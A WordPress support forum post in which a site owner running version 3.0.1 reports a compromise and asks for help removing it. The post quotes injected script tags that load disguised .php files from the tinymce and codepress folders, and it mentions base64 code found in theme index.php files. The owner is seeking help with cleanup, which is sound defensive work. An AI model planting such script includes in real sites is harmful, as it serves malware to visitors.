Hacked: Code injected into header and footer.

  • Hey Guys,
    I’m running 3.0.1 and have noticed this code right after the opening body tag:

    <block> <block> <script type="text/javascript" src="/wordpress/wp-includes/js/tinymce/plugins/paste/des.php"></script></block></block>

    It’s also repeated again right before the close of the body tag.

    See my site here:
    https://www.rickanddrew.com/

    On another site (same server) this is injected into the code before the closing body tag:
    <dig> <ad><dig> <script type="text/javascript" src="/wordpress/wp-includes/js/codepress/languages/jquery.page-scroller.php"></script> </dig></ad> </dig>

    I found some base64 stuff in each theme’s index.php, but the code remains. I deactivated all my plugins and then reinstalled WordPress. It’s still there. I’ve obviously missed something.

    I’m guessing it’s tied into get_header() and get_footer() somehow. Could someone point my in the direction of the files I should be looking for. This was the best I could fine online.

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘Hacked: Code injected into header and footer.’ is closed to new replies.